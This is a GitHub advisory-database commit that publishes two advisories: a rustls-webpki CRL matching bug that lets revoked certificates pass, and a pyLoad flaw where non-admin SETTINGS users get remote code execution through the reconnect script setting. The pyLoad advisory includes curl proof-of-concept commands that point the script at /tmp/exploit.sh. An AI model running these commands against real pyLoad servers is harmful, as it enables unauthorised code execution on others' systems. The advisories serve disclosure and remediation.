Skip to content

Commit d93d8b6

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-pwjx-qhcg-rvj4 GHSA-r7mc-x6x7-cqxx
1 parent 5405bda commit d93d8b6

2 files changed

Lines changed: 135 additions & 0 deletions

File tree

advisories/github-reviewed/2026/03/GHSA-pwjx-qhcg-rvj4/GHSA-pwjx-qhcg-rvj4.json

Lines changed: 74 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,74 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-pwjx-qhcg-rvj4",
4+
"modified": "2026-03-20T21:51:17Z",
5+
"published": "2026-03-20T21:51:17Z",
6+
"aliases": [],
7+
"summary": "webpki has a certificate revocation enforcement bug",
8+
"details": "There is a certificate revocation enforcement bug in `rustls-webpki` CRL processing. when both the certificate CRL distribution point and the CRL issuing distribution point contain multiple URI names, `IssuingDistributionPoint::authoritative_for()` reuses one-shot DER iterators across nested comparisons. If the only matching URI pair appears later in both sequences, the implementation misses the match, treats the CRL as non-authoritative, and under `UnknownStatusPolicy::Allow` accepts a revoked certificate.\n\n## affected versions\n\nrevocation support shipped in `0.104.0-alpha.4`, and the same iterator-reuse logic is still present at commit `e4590782afc1207c3e46ba1249e7c3fb9da95198` on 2026-03-20. i did not identify an upstream fix as of that date.\n\n## affected component\n\n- component: CRL authority matching for certificate DP vs CRL IDP names\n- repo pin: `https://github.com/rustls/webpki` @ `e4590782afc1207c3e46ba1249e7c3fb9da95198`\n- callsite: `src/crl/types.rs:626`, `src/crl/types.rs:649`, `src/crl/types.rs:664`\n- pinned source: [https://github.com/rustls/webpki/blob/e4590782afc1207c3e46ba1249e7c3fb9da95198/src/crl/types.rs#L626-L678](https://github.com/rustls/webpki/blob/e4590782afc1207c3e46ba1249e7c3fb9da95198/src/crl/types.rs#L626-L678)\n\n## technical details\n\nRFC 5280 section 5.2.5 and section 6.3.3(b)(2)(i) require the verifier to check whether one of the names in the IDP matches one of the names in the certificate DP. the current implementation contradicts that requirement in the later-match case because iterator state, not the actual set of URI names, determines whether later names are considered.\n\nthe attached PoC uses a single trust anchor and a single relevant CRL path. there is no alternate unconstrained root or duplicate trust path for the same key material, so the acceptance result is attributable to the DP/IDP matching bug rather than chain-builder fallback.\n\nthe vulnerable flow is:\n\n1. `authoritative_for()` parses `idp_general_names` once before iterating certificate distribution points.\n2. each certificate DP fullName is parsed into another one-shot `DerIterator`.\n3. `uri_name_in_common()` iterates the first IDP URI and drains the DP iterator while looking for a match.\n4. if the matching URI pair is second in both lists, it is never compared.\n5. the CRL is treated as non-authoritative, and `UnknownStatusPolicy::Allow` converts that into a successful verification result for a revoked certificate.\n\nthe repository already has a single-URI happy-path revocation test, which demonstrates the expected rejection path when the first URI matches. the attached PoC shows that simply moving the valid match to second position flips the result from `Err(CertRevoked)` to `Ok(())` under the permissive status policy.\n\n## steps to reproduce\n\nthe attached `poc.zip` contains a cargo-based integration harness. after extracting it, run `make canonical` to produce the vulnerable result and `make control` for the negative controls.\n\n```bash\nunzip poc.zip -d poc\ncd poc\nmake canonical\nmake control\n```\n\nthe canonical run emits:\n\n```text\n[CALLSITE_HIT]: authoritative_for::uri_name_in_common later_uri_pair_skipped=true\n[PROOF_MARKER]: vuln_case=Ok(()) first_uri_control=Err(CertRevoked) later_match_position=second allow_unknown=true\n[IMPACT_MARKER]: revoked_cert_accepted=true policy=UnknownStatusPolicy::Allow\n```\n\nthe control run emits:\n\n```text\n[CALLSITE_HIT]: authoritative_for::uri_name_in_common control_path=true\n[NC_MARKER]: first_uri_control=Err(CertRevoked) deny_policy=Err(UnknownRevocationStatus) vuln_blocked=true\n```\n\n## recommended fix\n\navoid reusing exhausted DER iterators across nested DP/IDP comparisons. a minimal fix is to reparse or snapshot the URI name sets for each comparison so that every IDP URI can be compared against the full DP URI set. a regression test should cover the case where the only valid URI match is later in both sequences.\n\ncheers,\nOleh Konko",
9+
"severity": [
10+
{
11+
"type": "CVSS_V3",
12+
"score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:N"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "crates.io",
19+
"name": "rustls-webpki"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0.101.0"
27+
},
28+
{
29+
"fixed": "0.103.10"
30+
}
31+
]
32+
}
33+
]
34+
},
35+
{
36+
"package": {
37+
"ecosystem": "crates.io",
38+
"name": "rustls-webpki"
39+
},
40+
"ranges": [
41+
{
42+
"type": "ECOSYSTEM",
43+
"events": [
44+
{
45+
"introduced": "0.104.0-alpha.1"
46+
},
47+
{
48+
"fixed": "0.104.0-alpha.5"
49+
}
50+
]
51+
}
52+
]
53+
}
54+
],
55+
"references": [
56+
{
57+
"type": "WEB",
58+
"url": "https://github.com/rustls/webpki/security/advisories/GHSA-pwjx-qhcg-rvj4"
59+
},
60+
{
61+
"type": "PACKAGE",
62+
"url": "https://github.com/rustls/webpki"
63+
}
64+
],
65+
"database_specific": {
66+
"cwe_ids": [
67+
"CWE-299"
68+
],
69+
"severity": "MODERATE",
70+
"github_reviewed": true,
71+
"github_reviewed_at": "2026-03-20T21:51:17Z",
72+
"nvd_published_at": null
73+
}
74+
}

advisories/github-reviewed/2026/03/GHSA-r7mc-x6x7-cqxx/GHSA-r7mc-x6x7-cqxx.json

Lines changed: 61 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,61 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-r7mc-x6x7-cqxx",
4+
"modified": "2026-03-20T21:50:30Z",
5+
"published": "2026-03-20T21:50:30Z",
6+
"aliases": [
7+
"CVE-2026-33509"
8+
],
9+
"summary": "pyLoad SETTINGS Permission Users Can Achieve Remote Code Execution via Unrestricted Reconnect Script Configuration",
10+
"details": "## Summary\n\nThe `set_config_value()` API endpoint allows users with the non-admin `SETTINGS` permission to modify any configuration option without restriction. The `reconnect.script` config option controls a file path that is passed directly to `subprocess.run()` in the thread manager's reconnect logic. A SETTINGS user can set this to any executable file on the system, achieving Remote Code Execution. The only validation in `set_config_value()` is a hardcoded check for `general.storage_folder` — all other security-critical settings including `reconnect.script` are writable without any allowlist or path restriction.\n\n## Details\n\nThe vulnerability chain spans two components:\n\n**1. Unrestricted config write — `src/pyload/core/api/__init__.py:210-243`**\n\n```python\n@permission(Perms.SETTINGS)\n@post\ndef set_config_value(self, category: str, option: str, value: Any, section: str = \"core\") -> None:\n self.pyload.addon_manager.dispatch_event(\n \"config_changed\", category, option, value, section\n )\n if section == \"core\":\n if category == \"general\" and option == \"storage_folder\":\n # Forbid setting the download folder inside dangerous locations\n # ... validation only for storage_folder ...\n return\n\n self.pyload.config.set(category, option, value) # No validation for any other option\n```\n\nThe `Perms.SETTINGS` permission (value 128) is a non-admin permission flag. The only hardcoded validation is for `general.storage_folder`. The `reconnect.script` option is written directly to config with no path validation, allowlist, or sanitization.\n\n**2. Arbitrary script execution — `src/pyload/core/managers/thread_manager.py:157-199`**\n\n```python\ndef try_reconnect(self):\n if not (\n self.pyload.config.get(\"reconnect\", \"enabled\")\n and self.pyload.api.is_time_reconnect()\n ):\n return False\n\n # ... checks if active downloads want reconnect ...\n\n reconnect_script = self.pyload.config.get(\"reconnect\", \"script\")\n if not os.path.isfile(reconnect_script):\n self.pyload.config.set(\"reconnect\", \"enabled\", False)\n self.pyload.log.warning(self._(\"Reconnect script not found!\"))\n return\n\n # ... reconnect logic ...\n\n try:\n subprocess.run(reconnect_script) # Executes attacker-controlled path\n except Exception:\n # ...\n```\n\nThe `reconnect_script` value comes directly from config. The only check is `os.path.isfile()` — the file must exist but there is no allowlist, no path restriction, and no signature verification.\n\n**3. Attacker also controls timing via same SETTINGS permission**\n\nThe attacker can set `reconnect.enabled=True`, `reconnect.start_time`, and `reconnect.end_time` through the same `set_config_value()` endpoint to control when execution occurs. `toggle_reconnect()` at line 321 requires only `Perms.STATUS` — an even lower privilege.\n\n**4. Additional privilege escalation via config access**\n\nBeyond RCE, the same unrestricted config write allows SETTINGS users to:\n- Read proxy credentials (`proxy.username`/`proxy.password`) in plaintext via `get_config()`\n- Redirect syslog to an attacker-controlled server (`log.syslog_host`/`log.syslog_port`)\n- Disable SSL (`webui.use_ssl=False`), rebind to `0.0.0.0` (`webui.host`)\n- Modify SSL certificate/key paths to enable MITM\n\n## PoC\n\n**Step 1: Set reconnect script to an attacker-controlled executable**\n\nVia API:\n```bash\n# Authenticate and get session (as user with SETTINGS permission)\ncurl -c cookies.txt -X POST 'http://target:8000/api/login' \\\n -d 'username=settingsuser&password=pass123'\n\n# Set reconnect script to a known executable on the system\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=script&value=/tmp/exploit.sh&section=core'\n```\n\nVia Web UI:\n```bash\ncurl -b cookies.txt -X POST 'http://target:8000/json/save_config?category=core' \\\n -d 'reconnect|script=/tmp/exploit.sh&reconnect|enabled=True'\n```\n\n**Step 2: Enable reconnect and set timing window**\n\n```bash\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=enabled&value=True&section=core'\n\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=start_time&value=00:00&section=core'\n\ncurl -b cookies.txt -X POST 'http://target:8000/api/set_config_value' \\\n -d 'category=reconnect&option=end_time&value=23:59&section=core'\n```\n\n**Step 3: Script executes when thread manager calls `try_reconnect()`**\n\nThe thread manager's `run()` method (called repeatedly by the core loop) invokes `try_reconnect()`, which calls `subprocess.run(reconnect_script)` at `thread_manager.py:199`.\n\n**Note on exploitation constraints:** The file at the target path must exist (`os.path.isfile()` check) and be executable. With `shell=False` (subprocess.run default), no arguments are passed. If the attacker also has `ADD` permission (common for non-admin users), they can use pyLoad to download an archive containing an executable script, which may retain execute permissions after extraction.\n\n## Impact\n\n- **Remote Code Execution**: A non-admin user with SETTINGS permission can execute arbitrary programs on the server as the pyLoad process user\n- **Privilege escalation**: The SETTINGS permission is described as \"can access settings\" — granting it is not expected to grant arbitrary code execution capability\n- **Credential exposure**: SETTINGS users can read proxy credentials, SSL key paths, and other sensitive config values via `get_config()`\n- **Network reconfiguration**: SETTINGS users can disable SSL, change bind address, redirect logging, and modify other security-critical network settings\n\n## Recommended Fix\n\nAdd an allowlist or category-level restriction in `set_config_value()` that prevents non-admin users from modifying security-critical options:\n\n```python\n# In set_config_value(), after the storage_folder check:\nADMIN_ONLY_OPTIONS = {\n (\"reconnect\", \"script\"),\n (\"webui\", \"host\"),\n (\"webui\", \"use_ssl\"),\n (\"webui\", \"ssl_cert\"),\n (\"webui\", \"ssl_key\"),\n (\"log\", \"syslog_host\"),\n (\"log\", \"syslog_port\"),\n (\"proxy\", \"username\"),\n (\"proxy\", \"password\"),\n}\n\nif section == \"core\" and (category, option) in ADMIN_ONLY_OPTIONS:\n # Require ADMIN role for security-critical settings\n if not self.pyload.api.user_data.get(\"role\") == Role.ADMIN:\n raise PermissionError(f\"Admin role required to modify {category}.{option}\")\n```\n\nAdditionally, consider validating the `reconnect.script` path against an allowlist of directories or requiring admin approval for script path changes.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "pyload-ng"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0.4.0"
29+
},
30+
{
31+
"last_affected": "0.5.0b3.dev96"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/pyload/pyload/commit/f5e284fcdfeaf08436bb03e5fcf697aaac659d8b"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/pyload/pyload"
50+
}
51+
],
52+
"database_specific": {
53+
"cwe_ids": [
54+
"CWE-269"
55+
],
56+
"severity": "HIGH",
57+
"github_reviewed": true,
58+
"github_reviewed_at": "2026-03-20T21:50:30Z",
59+
"nvd_published_at": null
60+
}
61+
}

0 commit comments

Comments
 (0)